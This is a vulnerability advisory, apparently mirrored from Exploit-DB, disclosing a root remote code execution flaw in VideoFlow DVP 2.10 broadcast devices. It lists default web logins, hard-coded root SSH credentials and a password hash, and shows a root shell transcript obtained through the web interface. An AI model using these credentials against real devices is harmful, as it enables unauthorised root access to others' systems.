VideoFlow Digital Video Protection (DVP) 2.10 – Hard-Coded Credentials

  • 作者: LiquidWorm
    日期: 2018-04-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44387/
  • VideoFlow Digital Video Protection DVP 10 Authenticated Root Remote Code Execution
    
    Vendor: VideoFlow Ltd.
    Product web page: http://www.video-flow.com
    Affected version: 2.10 (X-Prototype-Version: 1.6.0.2)
    
    System = Indicate if the DVP is configured as Protector, Sentinel or Fortress
    Version = The Operating System SW version number
    Image version = Production Image version
    
    System: DVP Protector
    Version: 1.40.0.15(R) May 5 2015 05:27:05
    Image version: 3.07i
    
    System: DVP Protector
    Version: 1.40.0.15(R) May 5 2015 05:27:05
    Image version: 2.08
    
    System: DVP Fortress
    Version: 2.10.0.5(R) Jan 7 2018 03:26:35
    Image version: 3.07
    
    
    Summary: VideoFlow's Digital Video Protection (DVP) product is used by
    leading companies worldwide to boost the reliability of IP networks, including
    the public Internet, for professional live broadcast. DVP enables broadcast
    companies to confidently contribute and distribute live video over IP with
    unprecedented levels of service continuity, at a fraction of the cost of
    leased lines or satellite links. It accelerates ROI by reducing operational
    costs and enabling new revenue streams across a wide variety of markets.
    
    Desc: The affected device suffers from authenticated remote code execution
    vulnerability. Including a CSRF, a remote attacker can exploit this issue
    and execute arbitrary system commands granting her system access with root
    privileges.
    
    Tested on: CentOS release 5.6 (Final) (2.6.18-238.12.1.el5)
     CentOS release 5.10 (Final) (2.6.18-371.el5)
     ConfD
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    @zeroscience
    
    
    Advisory ID: ZSL-2018-5455
    Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5455.php
    
    01.02.2018
    
    ---
    
    
    Default credentials (web management):
    
    admin:admin
    oper:oper
    private:private
    public:public
    devel:devel
    
    
    Hard-Coded credentials (ssh):
    
    root:videoflow
    mom:$1$CGgdGXXG$0FmyyKMzcHgkKnUTZi5r./
    
    
    -------------------------------- > Tools > System > Shell > --------------------------------
    ||
    | sh-3.2# id;pwd;uname -a;ls |
    | uid=0(root) gid=0(root)|
    | /dvp100/confd|
    | Linux localhost.localdomain 2.6.18-371.el5 #1 SMP Tue Oct 1 08:37:57 EDT 2013 i6 |
    | 86 i686 i386 GNU/Linux |
    | aaa_cdb.fxs ietf-inet-types.fxsSNMP-USER-BASED-SM-MIB.fxs|
    | authorization.fxs ietf-yang-types.fxsSNMPv2-MIB.fxs|
    | browser.log IF-MIB.bin SNMPv2-SMI.fxs|
    | community_init.xmlIF-MIB.fxs SNMPv2-TC.fxs |
    | confd.confIPV6-TC.fxsSNMP-VIEW-BASED-ACM-MIB.fxs |
    | config.webMakefile TRANSPORT-ADDRESS-MIB.fxs |
    | docroot SNMP-COMMUNITY-MIB.fxs users.fxs |
    | dvp.fxs SNMP-FRAMEWORK-MIB.fxs vacm_init.xml |
    | dvp_init.xmlSNMP-MPD-MIB.fxs webspec.dat |
    | IANAifType-MIB.binSNMP-NOTIFICATION-MIB.fxs|
    | IANAifType-MIB.fxsSNMP-TARGET-MIB.fxs|
    | sh-3.2# cat /etc/issue |
    | CentOS release 5.10 (Final)|
    | Kernel \r on an \m |
    ||
    --------------------------------------------------------------------------------------------